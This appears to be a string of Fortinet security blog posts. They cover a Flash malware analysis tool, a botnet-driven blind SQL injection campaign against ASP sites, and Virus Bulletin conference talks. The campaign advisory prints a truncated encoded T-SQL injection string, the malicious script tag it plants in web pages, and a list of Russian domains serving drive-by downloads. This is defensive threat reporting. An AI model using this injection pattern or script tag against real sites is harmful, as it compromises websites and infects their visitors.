EASE stands for Experimental ActionScript Emulator, and besides being a pun of debatable quality, it is the in-house tool we at FortiGuard use to analyse malicious Flash samples, unpack obfuscated code (if applicable), and automatically detect heap spraying and JIT spraying (two techniques essential to bypass DEP/ASLR when exploiting a vulnerability).

Adobe Flash being nearly ubiquitous today, this is quite a useful tool for analysts and security researchers alike. Now for the bad news, which actually lays in its very name: It’s experimental. But we have good news to balance that: FortiGuard researcher Bing Liu will detail EASE and demo it tomorrow at VirusBulletin 2011, in Barcelona.

So, if you are interested in Flash malware or Flash exploits and you attend the conference, make sure not to miss Bing’s presentation.

And if you missed Crypto Girl‘s presentation yesterday, you can still catch her around the conference – she’s quite easy to spot with her superhero costume.

Like last December, a blind SQL injection targeting ASP pages using Transact SQL is attempted using the following chain as a request argument:

DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564…%20AS%20VARCHAR(4000));EXEC(@S)

Once decoded, it turns out this code tries to inject malicious javascript in the database contents, so nothing new here; the sample we have seen injected:

<script src=hxxp://www.bannerdriven.ru/ads.js</script>

As this string is concatenated with the HTML <title> tag, it’s easy to use Google to find more victims. Hundreds of websites have already been compromised. From what we saw, the injected javascript’s goal is to silently redirect users to malicious servers are located in Russia. Here is a non-exhaustive list:

www.ads-t.ru/ads.js
www.bannert.ru/ads.js
www.bannerdriven.ru/ads.js
www.adtcp.ru/ads.js
www.adbnr.ru/ads.js
www.htmlads.ru/ads.js

These sites are set-up to trap victims using drive-by-download attacks. The web exploit toolkit powering those attacks was updated to also target latest vulnerabilities in Adobe Flash (swf files) and Adobe Reader (pdf files).

The injection vector is still the same as last year (vulnerable server-side scripts), however from the results we can get, there are still many web applications vulnerable to SQL injection attacks (and I believe this is a never-ending battle). So why should they look for another attack vector? Besides, the web exploit toolkit update ensure a steady rate of newly infected machines, and a constant growth of their Botnet.

At the VB conference, during the Q&A session of our speech, a cunning attendee suggested that the positive side of last year’s ubiquitous Botnet-powered SQL injection campains was that at least, it served as a giant pen-test for the Web. Unfortunately, it seems that the pen-test aftermath, as alarming as it was, did not suffice to raise the awareness of webmasters to a point where cybercriminals would stop to have an endless supply of machines ready to be infected.

Did you update your third-party software recently?

Fortinet customers are protected using Fortiguard IPS that detects malicious SQL queries in HTTP requests.

‘I am not a numero!’: assessing global security threat levels – Bryan Lu

Fighting cybercrime: technical, juridical, and ethical challenges – Guillaume Lovet

Botnet-powered SQL injection attacks: a deeper look within – David Maciejak & Guillaume Lovet

It’s the 4th year in a row that Fortinet has had at least one paper in the line-up, but the first time we hit a count of three presentations.

The conference was held last month in Geneva, Switzerland, and was quite exciting (see program here). Despite the economic situation, the number of attendants hit a record high this year – which was perceptible during the keynote presentation, but less so afterwards. It seems as if over time people are considering the conference more as a social and professional networking event than a presentation-driven one.

We did follow some presentations in the corporate and technical tracks, the latter slightly more crowded. There were some nice discussions around current topics such as cloud computing (Marian Radu and Hilda Larina Ragragio from Microsoft) or malware sandboxing (Thomas Mandl Secure Business Austria/IKARUS Security Software, Florian Nentwich IKARUS Security Software, Ulrich Bayer and Engin Kirda from Vienna University of Technology/Institute Eurecom), as well as more traditional static analysis (Elda Dimakiling, Francis Allan Tan Seng and Scott Wu from Microsoft) and botnet history (Erik Wu and Gunter Ollmann, Damballa). I got particularly interested by the in-depth looks at some threats like Koobface (Ryan Flores, Joey Costoya and Jonell Baltazar from Trend Micro) or vulnerabilities like MS08-067. Guillaume also shared a good presentation on poorly-known aspects of fighting cyber-crime. Threats leveraging popular Internet web sites also had the honor of multiple presentations this year (especially Twitter and Facebook).

In the upcoming events, I would love to see more discussion around mobile security. Besides the “iPhone v3 malware vector” presentation (Marius van Oers from McAfee), the only other one was “Mobile malware/security: iPhone in the enterprise,” but unfortunately, it was canceled. Nonetheless, this year’s  vintage of the iconic conference of the AV industry was good, and as always a perfect occasion to put faces on various names (and beers into various faces). I hope the 2010 one will be just as good, so… see you in Vancouver ?

Only 38 of more than 160 proposals were selected by the VB2009 committee for this year’s conference program. That said, here are the presentations to check out:

• “Fighting cybercrime: technical, juridical and ethical challenges,” Wednesday, September 23, 4:20 p.m. Speaker: Guillaume Lovet, Threat Response senior manager.
• “‘I am not a numero!’: assessing global security threat levels,” Thursday, September 24, 10:40 a.m. Speaker: Bryan Lu, FortiGuard project manager.
• “The hackpacker guide: an in-depth look into custom run-time packers,” Thursday, September 24, 5:00 p.m. Speaker: Xu Yang, FortiGuard project manager.
• “Botnet-powered SQL injection attacks: a deeper look within” Thursday, September 24, 4:20 p.m. Speakers: David Maciejak, IPS analyst, and Guillaume Lovet.

Will you attend VB2009?